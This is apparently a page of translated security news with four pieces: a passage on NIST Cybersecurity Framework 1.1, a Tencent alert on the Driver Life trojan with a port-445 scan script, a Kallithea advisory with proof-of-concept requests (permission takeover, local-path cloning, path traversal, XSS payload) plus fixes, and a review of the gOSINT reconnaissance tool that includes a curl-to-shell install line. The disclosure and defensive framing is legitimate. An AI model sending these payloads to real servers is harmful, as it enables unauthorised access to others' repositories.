The framework emphasises "the critical role cyber supply chain risk management plays in addressing cybersecurity risk in critical infrastructure and the broader digital economy". The framework's "implementation tiers" give organisations a mechanism to understand the characteristics of their approach to managing cybersecurity risk, providing a way of viewing cyber risk and processes for managing it, to help organisations set priorities and achieve their cybersecurity goals.

"Implementation tiers" refer to the maturity of an organisation's security risk management practice, measured by elements such as risk and threat awareness, repeatability and adaptiveness. The tiers describe an organisation's practice across four levels, from Tier 1 (Partial) to Tier 4 (Adaptive), reflecting a progression from informal, reactive responses to adaptive performance. The framework notes that in determining its tier, an organisation should consider its current risk management practices, threat environment, legal and regulatory requirements, business/mission objectives and constraints.

Other updates include a better explanation of the relationship between implementation tiers and profiles; more refined language around the term "compliance", given how varied organisations' uses of the framework are; and a new subcategory related to the vulnerability disclosure lifecycle.

Discussion of the new framework and further considerations

The framework's executive summary states:

While this document was developed to improve cybersecurity risk management in critical infrastructure, the framework can be used by organisations in any sector or community. The framework enables organisations, regardless of size, degree of cybersecurity risk or cybersecurity sophistication, to apply the principles and best practices of risk management to improving security and resilience.

The goal is therefore to remain flexible enough for voluntary adoption by businesses and organisations large and small across all industry sectors, as well as by federal, state and local governments. It is also worth noting that the framework is not just about technology and process: it comprehensively covers people, process and technology.

Adoption so far has been considerable. According to Gartner, only 30% of US organisations used the framework in 2015, but that number is expected to rise to 50% by 2020.

Like almost all data security standards, the NIST Cybersecurity Framework is not mandatory. While security professionals often adopt these standards and framework documents as tools to help build the protective architecture they need, practitioners generally choose the tools that fit their own circumstances (company size, specific network environment, and so on).

However, the executive order signed by President Trump, "Strengthening the Cybersecurity of Federal Networks and Critical Infrastructure", proposes stronger cybersecurity measures at three levels: federal government networks, critical infrastructure, and national security as a whole. It can be understood as requiring federal agencies to comply with the NIST Cybersecurity Framework, because the executive order requires agency heads to submit risk management reports to the OMB (Office of Management and Budget) describing their specific plans for implementing the framework.

Given the current directive, all major government contractors may well face similar requirements.

On the same question, Eric Rosenbach, lecturer in public policy and co-director of Harvard's Belfer Center for Science and International Affairs, told senators in written testimony that Congress should require all critical infrastructure providers to adopt the framework.

Rosenbach cited the recent ransomware attacks against the city of Atlanta and against Boeing, stressing that the critical infrastructure sector faces clear threats that must be addressed.

Cyber risk affects every aspect of our economy and society. It is a national threat, and only a nationwide joint effort can successfully address it. Government must of course play a leading role, but ultimately it is the actions of private enterprise and non-governmental organisations that will determine whether we succeed.

Later this year, NIST plans to release an updated companion document, the Roadmap for Improving Critical Infrastructure Cybersecurity, which describes key areas of development, alignment and collaboration.

As cybersecurity framework program manager Matt Barrett put it:

The cybersecurity framework needs to evolve with threats, technology and industry. With this update we have demonstrated that we have a sound process for bringing stakeholders together to ensure the framework remains a great tool for managing cyber risk.

The original text of version 1.1 of the Framework for Improving Critical Infrastructure Cybersecurity:

https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf

Tencent PC Manager Virus Alert: "Driver Life Trojan" Infects 100,000 Computers, Now Detected and Removed

[Summary] This trojan exploits a high-risk vulnerability to spread like a worm across enterprise intranets and then downloads further cloud-controlled trojans, posing a huge threat to enterprise information security. Enterprise users are advised to pay close attention, check intranet hosts for infection after work resumes on Monday, and take infected machines offline.

On the afternoon of 14 December, Tencent PC Manager detected the sudden outbreak of a trojan spreading through the 驱动人生 ("Driver Life") upgrade channel while also exploiting the high-risk "EternalBlue" vulnerability; in just two hours, as many as 100,000 users were attacked. Tencent PC Manager can precisely intercept the attack, and the team will continue tracking the virus and sharing related information.


[Figure: the trojan downloaded by the virus being removed by Tencent PC Manager]

Note that because this trojan exploits a high-risk vulnerability to spread worm-like across corporate intranets and then downloads a cloud-controlled trojan, it poses a serious threat to enterprise information security. Enterprise users should pay close attention, check intranet machines for infection when work resumes on Monday, and take any infected hosts offline.

Tracing the infection chain, PC Manager found that the trojan began spreading at around 14:00 on December 14 via software such as 驱动人生 and 人生日历, with the spreading source being dtlupg.exe (apparently an update program) inside that software.

Tencent security experts say roughly 70% of this outbreak spread through the 驱动人生 update channel, while about 30% self-propagated through the EternalBlue vulnerability. After compromising a machine, the trojan downloads and executes a cloud-controlled payload and uses EternalBlue to spread actively across the local network. Its author can control infected machines from the cloud and collect some of their information, and on cloud command the machines mine Monero. Tencent PC Manager is watching the trojan's next moves closely; ordinary users need not worry and can use security software such as Tencent PC Manager to block and remove it.


[Figure: Tencent Yudian (御点) blocking the trojan that spreads via the EternalBlue exploit]

Addressing the trojan's potential threat to enterprise information security, Ma Jinsong, head of Tencent's anti-virus lab and a Tencent PC Manager security expert, advises enterprise users to temporarily close unnecessary server ports such as 135, 139, and 445; to use the vulnerability-patching feature of the Tencent Yudian endpoint security management system to fix high-risk system vulnerabilities promptly; to use strong server passwords, never weak ones, to prevent brute-force attacks; and to consider deploying the Tencent Yujie (御界) advanced threat detection system. That system can efficiently detect unknown threats and, by analyzing network traffic at the boundary between the corporate intranet and the internet, sense exploitation and attacks.
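As a concrete starting point for that Monday-morning check, here is a minimal sketch (the subnet and timeout are hypothetical placeholders, not values from the advisory) that sweeps an intranet range for hosts still exposing TCP 445, the SMB port the EternalBlue exploit targets:

import socket
from ipaddress import ip_network

SUBNET = "192.168.1.0/24"  # hypothetical intranet range; substitute your own
PORT = 445                 # SMB, the service EternalBlue attacks

for host in ip_network(SUBNET).hosts():
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(0.5)   # short timeout keeps the sweep fast on a LAN
    try:
        if sock.connect_ex((str(host), PORT)) == 0:
            # Port 445 reachable: patch this host or block the port as advised above
            print(f"{host}: port {PORT} open")
    finally:
        sock.close()

Hosts flagged here are candidates for the patching and port-blocking steps above, not confirmed infections.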


[Figure: the Tencent Yujie advanced threat detection system detecting the threat]

In the early hours of the 15th, 驱动人生's official Weibo account posted a statement saying that "a vulnerability in the upgrade component of a small number of old, un-updated versions of the product was maliciously exploited in an attack; the new version now uses an entirely new upgrade component. Users on old versions are advised to update manually."

Kallithea <= 0.3.4 Incorrect access control and XSS

Homepage:

https://kallithea-scm.org/security/

Description:

Introduction

1. This vulnerability allows a normal user to modify the permissions of repositories that they normally shouldn't have access to.

This allows the user to get full admin access to the repository.

edit_permissions_update and edit_permissions_revoke are not decorated with @HasRepoPermissionAllDecorator('repository.admin').

File: kallithea\controllers\admin\repos.py

def edit_permissions_update(self, repo_name):
    form = RepoPermsForm()().to_python(request.POST)
    RepoModel()._update_permissions(repo_name, form['perms_new'],
                                    form['perms_updates'])
    #TODO: implement this
    #action_logger(self.authuser, 'admin_changed_repo_permissions',
    #              repo_name, self.ip_addr, self.sa)
    Session().commit()
    h.flash(_('Repository permissions updated'), category='success')
    return redirect(url('edit_repo_perms', repo_name=repo_name))

def edit_permissions_revoke(self, repo_name):
    try:
        obj_type = request.POST.get('obj_type')
        obj_id = None
        if obj_type == 'user':
            obj_id = safe_int(request.POST.get('user_id'))
        elif obj_type == 'user_group':
            obj_id = safe_int(request.POST.get('user_group_id'))

        if obj_type == 'user':
            RepoModel().revoke_user_permission(repo=repo_name, user=obj_id)
        elif obj_type == 'user_group':
            RepoModel().revoke_user_group_permission(repo=repo_name,
                                                     group_name=obj_id)
        #TODO: implement this
        #action_logger(self.authuser, 'admin_revoked_repo_permissions',
        #              repo_name, self.ip_addr, self.sa)
        Session().commit()
    except Exception:
        log.error(traceback.format_exc())
        h.flash(_('An error occurred during revoking of permission'),
                category='error')
        raise HTTPInternalServerError()

POC:

Set your_token_here and your_username to your own values.

After this, your_username obtains repository.admin access to not_my_secret_repo.

POST /not_my_secret_repo/settings/permissions HTTP/1.1
Host: localhost:5000
Content-Length: 225
Connection: close

_method=put&_authentication_token=%your_token_here%&repo_private=False&u_perm_default=repository.admin&perm_new_member_1=repository.admin&perm_new_member_name_1=%your_username%&perm_new_member_type_1=user&save=Save
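A plausible fix, following the advisory's own observation, is simply to apply the missing decorator to both controller methods; this is a sketch only, not the official Kallithea patch:

@HasRepoPermissionAllDecorator('repository.admin')
def edit_permissions_update(self, repo_name):
    ...  # body unchanged

@HasRepoPermissionAllDecorator('repository.admin')
def edit_permissions_revoke(self, repo_name):
    ...  # body unchanged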

2. This vulnerability allows a normal user to access the contents of repositories they do not normally have access to.

A user can access any repository through the clone functionality if they know its name.

clone_uri inside the create_repo API call is not properly validated, so it is possible to pass a local path in this parameter.

The newly created repository then contains an exact copy of the repository you do not have access to.

POC:

GET /_admin/api HTTP/1.1
Host: localhost:5000
Content-Length: 168
Connection: close

{"id":1,"api_key":"your_api_key","method":"create_repo","args":{"repo_name":"repo_copy","clone_uri":"C:\\kalithea\\repo_dir\\secret_repo"}}

3. This vulnerability allows a normal user to clone a repository to a filesystem path outside the Kallithea repository root.

repo_name inside the create_repo API call is not properly validated.

It is possible to set it to something like ../../../upper_dir

POC:

GET /_admin/api HTTP/1.1
Host: localhost:5000
Connection: close
Content-Length: 126

{"id":1,"api_key":"your_api_key","method":"create_repo","args":{"repo_name":"../../../upper_dir"}}
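Issues 2 and 3 both stem from missing input validation on create_repo. Here is a minimal sketch of the kind of checks a fix would need (illustrative only; validate_repo_name, validate_clone_uri, and the repository root path are hypothetical names, not Kallithea's actual patch):

import os

REPO_ROOT = os.path.realpath('/srv/kallithea/repos')  # hypothetical repository root

def validate_repo_name(repo_name):
    # Issue 3: the resolved path must stay under the repository root
    target = os.path.realpath(os.path.join(REPO_ROOT, repo_name))
    if not target.startswith(REPO_ROOT + os.sep):
        raise ValueError('repo_name escapes the repository root')
    return repo_name

def validate_clone_uri(clone_uri):
    # Issue 2: a bare local path would let a user copy repositories
    # they cannot otherwise read, so only allow remote http(s) sources
    if clone_uri and not clone_uri.startswith(('http://', 'https://')):
        raise ValueError('clone_uri must be a remote http(s) URL')
    return clone_uri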

4. This vulnerability allows a normal user to inject code into pages visible to other users/visitors of Kallithea (XSS).

repo_name inside the create_repo API call is not properly validated and is vulnerable to an XSS attack.

The XSS fires after you click the "Repositories" button, and also inside _admin/repo_groups/new (with a different payload).

POC:

GET /_admin/api HTTP/1.1
Host: localhost:5000
Content-Length: 140
Connection: close

{"id":1,"api_key":"your_api_key","method":"create_repo","args":{"repo_name":"<img src=x onerror=alert(1)>/sth"}}
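The XSS becomes inert once repo_name is HTML-escaped wherever it is rendered; a minimal standard-library illustration (Kallithea's actual fix may differ):

import html

repo_name = '<img src=x onerror=alert(1)>/sth'
# Escaping on output turns the payload into harmless text
print(html.escape(repo_name))
# prints: &lt;img src=x onerror=alert(1)&gt;/sth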

POC Files on Github

Timeline: 12-12-2018: Release

GOSINT: a newer tool in open source intelligence (OSINT)


GOSINT is an open source intelligence gathering tool written in Go. It is quite new and still under development, and anyone willing to contribute is welcome to join in. In some respects, gOSINT arguably has the edge over Recon-ng; you can read my earlier post evaluating Recon-ng here.

gOSINT depends on the open source OCR engine Tesseract, along with libtesseract-dev and libleptonica-dev, which must be installed on the machine before use. gOSINT supports both Linux and Windows.

The easiest way to install it on Linux, the operating system hackers and penetration testers favor, is with the go get command:

go get github.com/Nhoya/gOSINT/cmd/gosint

We can also install it by cloning the repository:

git clone https://github.com/Nhoya/gOSINT.git

and then installing the dependencies manually:

curl https://raw.githubusercontent.com/golang/dep/master/install.sh | sh

(no Golang required)

One point where Recon-ng beats gOSINT is ease of installation, since most of its dependencies are already available in most Linux distributions (and it ships with Kali Linux).

Once installation is complete, we can use the several modules that have so far been integrated into gOSINT. First, navigate to the directory from which gOSINT can be run:

root@prismacsi:~/go/src/github.com/Nhoya/gOSINT/cmd/gosint#

Then type:

./gosint help

to display the tool's help information.

So far, gOSINT implements the following modules:

1. Git support for email retrieval, using the GitHub API or a plain clone-and-search
2. Searching PGP servers for email addresses, aliases, and key IDs
3. Searching haveibeenpwned.com for leaked email addresses
4. Retrieving the message history of public Telegram groups
5. Sending queries to shodan.io
6. Retrieving the name of a phone number's owner
7. Enumerating subdomains with crt.sh (see the sketch just below)
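To give a feel for what module 7 does, here is a minimal sketch of a certificate-transparency lookup against crt.sh (assuming its public JSON endpoint; gOSINT's own implementation may differ):

import json
import urllib.request

domain = 'example.com'  # hypothetical target domain
# %25 is a URL-encoded '%', crt.sh's wildcard character
url = f'https://crt.sh/?q=%25.{domain}&output=json'

with urllib.request.urlopen(url) as resp:
    entries = json.load(resp)

# Each certificate-transparency entry can name several (sub)domains
subdomains = set()
for entry in entries:
    subdomains.update(entry['name_value'].split('\n'))

for name in sorted(subdomains):
    print(name)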

Some modules are not yet fully functional; as noted, gOSINT is still under development. Let us look at the handful of modules already implemented.

PGP MODULE

This module searches Pretty Good Privacy (PGP) servers for email addresses, aliases, and key IDs.

The command format for this module is:

./gosint pgp <domain_name>

The results below come from two example domains.


[Screenshots: gOSINT pgp results for the two example domains]

Now let us compare gOSINT's results with recon-ng's for the same two domains.


[Screenshot: recon-ng results for the same two domains]

Although gOSINT's interface is not as polished as recon-ng's, it clearly returns more detailed results. That does not mean recon-ng cannot do the job; on the contrary, recon-ng saves retrieved data straight into its internal database, which makes later reconnaissance easier.

PNI MODULE

This module looks a phone number up on the sync.me service and returns the owner's name. It still has some open issues, such as an unresolved captcha limit, but those should be fixed as development continues. The screenshot below shows what the module returns in its current state.


[Screenshot: gOSINT pni output]

Recon-ng has no module for this exact function, but it does have one that returns a list of email addresses and names associated with a given host or domain, as shown below:


[Screenshots: recon-ng output for email addresses and names]
PWD MODULE

This module queries the haveibeenpwned.com service for leaked email addresses, a potential source of targets for attackers. A penetration tester would accordingly advise employees whose company email addresses turn up there to take better proactive measures to protect their accounts.

The command format is:

./gosint pwd <email_address>

Example:


[Screenshot: gOSINT pwd output]
SHODAN MODULE

This is the last module covered here. As Wikipedia defines it, Shodan is a search engine that lets users find specific types of internet-connected computers through custom filters.

gOSINT's Shodan support is still basic, but it does what it promises, including spotting honeypots, which are typically deployed to capture and analyze attack behavior and thereby strengthen an organization's defenses.

./gosint shodan 23.22.39.120 honeypot

The result:


[Screenshot: gOSINT shodan output]

shodan.io supports many kinds of searches with a wide range of filters, but little of that has made it into gOSINT's shodan module so far. As more developers join the project, the module should gain functionality. Compared with recon-ng, gOSINT still has a long way to go: below is the output of recon-ng's shodan module, which returns multiple hostnames associated with the given domain.
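For comparison, the official shodan Python package already exposes Shodan's full filter set; a minimal sketch of the same host lookup (assuming a valid API key):

import shodan

API_KEY = 'your_api_key'  # placeholder; use your own Shodan API key
api = shodan.Shodan(API_KEY)

host = api.host('23.22.39.120')  # the IP from the gOSINT example above
print(host.get('org'), host.get('os'))
for service in host['data']:
    # one entry per open port/banner Shodan has indexed
    print(service['port'], service.get('product', ''))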


[Screenshots: recon-ng shodan module output]

This again shows recon-ng's edge here, which matters to any penetration tester or hacker trying to save time during OSINT reconnaissance, and it is why most hackers reach for recon-ng first before breaking into or probing a computer system or infrastructure. In recent years, though, recon-ng's development has hit something of a plateau, so the field badly needs fresh blood. Once all of its modules are up and running, gOSINT could become a very powerful reconnaissance tool. Time will tell!

*Source: prismacsi; compiled by FB editor secist. Please credit CodeSec.Net when republishing.
